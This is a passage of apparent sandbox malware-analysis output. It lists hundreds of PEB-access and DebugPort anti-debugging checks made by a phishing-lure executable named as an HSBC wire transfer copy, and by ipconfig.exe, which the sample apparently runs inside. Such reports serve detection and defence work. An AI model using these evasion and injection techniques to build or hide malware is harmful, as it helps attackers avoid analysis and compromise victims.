          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E14FB mov eax, dword ptr fs:[00000030h]6_2_016E14FB
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]6_2_016A6CF0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]6_2_016A6CF0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]6_2_016A6CF0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8CD6 mov eax, dword ptr fs:[00000030h]6_2_016F8CD6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163849B mov eax, dword ptr fs:[00000030h]6_2_0163849B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163FF60 mov eax, dword ptr fs:[00000030h]6_2_0163FF60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8F6A mov eax, dword ptr fs:[00000030h]6_2_016F8F6A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163EF40 mov eax, dword ptr fs:[00000030h]6_2_0163EF40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]6_2_01624F2E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]6_2_01624F2E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165E730 mov eax, dword ptr fs:[00000030h]6_2_0165E730
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]6_2_0164B73D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]6_2_0164B73D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]6_2_016F070D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]6_2_016F070D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]6_2_0165A70E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]6_2_0165A70E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164F716 mov eax, dword ptr fs:[00000030h]6_2_0164F716
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]6_2_016BFF10
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]6_2_016BFF10
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016637F5 mov eax, dword ptr fs:[00000030h]6_2_016637F5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01638794 mov eax, dword ptr fs:[00000030h]6_2_01638794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]6_2_016A7794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]6_2_016A7794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]6_2_016A7794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163766D mov eax, dword ptr fs:[00000030h]6_2_0163766D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]6_2_016EAE44
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]6_2_016EAE44
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162E620 mov eax, dword ptr fs:[00000030h]6_2_0162E620
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFE3F mov eax, dword ptr fs:[00000030h]6_2_016DFE3F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]6_2_0162C600
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]6_2_0162C600
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]6_2_0162C600
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01658E00 mov eax, dword ptr fs:[00000030h]6_2_01658E00
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1608 mov eax, dword ptr fs:[00000030h]6_2_016E1608
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]6_2_0165A61C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]6_2_0165A61C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016376E2 mov eax, dword ptr fs:[00000030h]6_2_016376E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016516E0 mov ecx, dword ptr fs:[00000030h]6_2_016516E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01668EC7 mov eax, dword ptr fs:[00000030h]6_2_01668EC7
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016536CC mov eax, dword ptr fs:[00000030h]6_2_016536CC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFEC0 mov eax, dword ptr fs:[00000030h]6_2_016DFEC0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8ED6 mov eax, dword ptr fs:[00000030h]6_2_016F8ED6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]6_2_016F0EA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]6_2_016F0EA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]6_2_016F0EA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A46A7 mov eax, dword ptr fs:[00000030h]6_2_016A46A7
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFE87 mov eax, dword ptr fs:[00000030h]6_2_016BFE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364DB60 mov ecx, dword ptr fs:[00000030h]16_2_0364DB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]16_2_03673B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]16_2_03673B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364DB40 mov eax, dword ptr fs:[00000030h]16_2_0364DB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03718B58 mov eax, dword ptr fs:[00000030h]16_2_03718B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364F358 mov eax, dword ptr fs:[00000030h]16_2_0364F358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370131B mov eax, dword ptr fs:[00000030h]16_2_0370131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366DBE9 mov eax, dword ptr fs:[00000030h]16_2_0366DBE9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C53CA mov eax, dword ptr fs:[00000030h]16_2_036C53CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C53CA mov eax, dword ptr fs:[00000030h]16_2_036C53CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]16_2_03674BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]16_2_03674BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]16_2_03674BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03715BA5 mov eax, dword ptr fs:[00000030h]16_2_03715BA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03651B8F mov eax, dword ptr fs:[00000030h]16_2_03651B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03651B8F mov eax, dword ptr fs:[00000030h]16_2_03651B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FD380 mov ecx, dword ptr fs:[00000030h]16_2_036FD380
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672397 mov eax, dword ptr fs:[00000030h]16_2_03672397
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367B390 mov eax, dword ptr fs:[00000030h]16_2_0367B390
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370138A mov eax, dword ptr fs:[00000030h]16_2_0370138A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FB260 mov eax, dword ptr fs:[00000030h]16_2_036FB260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FB260 mov eax, dword ptr fs:[00000030h]16_2_036FB260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368927A mov eax, dword ptr fs:[00000030h]16_2_0368927A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03718A62 mov eax, dword ptr fs:[00000030h]16_2_03718A62
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]16_2_03649240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]16_2_03649240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]16_2_03649240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]16_2_03649240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370EA55 mov eax, dword ptr fs:[00000030h]16_2_0370EA55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036D4257 mov eax, dword ptr fs:[00000030h]16_2_036D4257
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03684A2C mov eax, dword ptr fs:[00000030h]16_2_03684A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03684A2C mov eax, dword ptr fs:[00000030h]16_2_03684A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]16_2_0366A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370AA16 mov eax, dword ptr fs:[00000030h]16_2_0370AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370AA16 mov eax, dword ptr fs:[00000030h]16_2_0370AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03658A0A mov eax, dword ptr fs:[00000030h]16_2_03658A0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364AA16 mov eax, dword ptr fs:[00000030h]16_2_0364AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364AA16 mov eax, dword ptr fs:[00000030h]16_2_0364AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]16_2_03645210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov ecx, dword ptr fs:[00000030h]16_2_03645210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]16_2_03645210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]16_2_03645210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03663A1C mov eax, dword ptr fs:[00000030h]16_2_03663A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672AE4 mov eax, dword ptr fs:[00000030h]16_2_03672AE4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672ACB mov eax, dword ptr fs:[00000030h]16_2_03672ACB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]16_2_036452A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]16_2_036452A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]16_2_036452A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]16_2_036452A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]16_2_036452A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365AAB0 mov eax, dword ptr fs:[00000030h]16_2_0365AAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365AAB0 mov eax, dword ptr fs:[00000030h]16_2_0365AAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367FAB0 mov eax, dword ptr fs:[00000030h]16_2_0367FAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367D294 mov eax, dword ptr fs:[00000030h]16_2_0367D294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367D294 mov eax, dword ptr fs:[00000030h]16_2_0367D294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364C962 mov eax, dword ptr fs:[00000030h]16_2_0364C962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B171 mov eax, dword ptr fs:[00000030h]16_2_0364B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B171 mov eax, dword ptr fs:[00000030h]16_2_0364B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366B944 mov eax, dword ptr fs:[00000030h]16_2_0366B944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366B944 mov eax, dword ptr fs:[00000030h]16_2_0366B944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03664120 mov ecx, dword ptr fs:[00000030h]16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367513A mov eax, dword ptr fs:[00000030h]16_2_0367513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367513A mov eax, dword ptr fs:[00000030h]16_2_0367513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]16_2_03649100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]16_2_03649100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]16_2_03649100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036D41E8 mov eax, dword ptr fs:[00000030h]16_2_036D41E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]16_2_0364B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]16_2_0364B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]16_2_0364B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]16_2_036761A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]16_2_036761A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C69A6 mov eax, dword ptr fs:[00000030h]16_2_036C69A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]16_2_036C51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]16_2_036C51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]16_2_036C51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]16_2_036C51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]16_2_037049A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]16_2_037049A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]16_2_037049A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]16_2_037049A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367A185 mov eax, dword ptr fs:[00000030h]16_2_0367A185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366C182 mov eax, dword ptr fs:[00000030h]16_2_0366C182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03672990 mov eax, dword ptr fs:[00000030h]16_2_03672990
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03702073 mov eax, dword ptr fs:[00000030h]16_2_03702073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03711074 mov eax, dword ptr fs:[00000030h]16_2_03711074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]16_2_03660050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]16_2_03660050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]16_2_0367002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]16_2_0367002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]16_2_0367002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]16_2_0367002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]16_2_0367002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]16_2_0365B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]16_2_0365B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]16_2_0365B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]16_2_0365B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A830 mov eax, dword ptr fs:[00000030h]16_2_0366A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
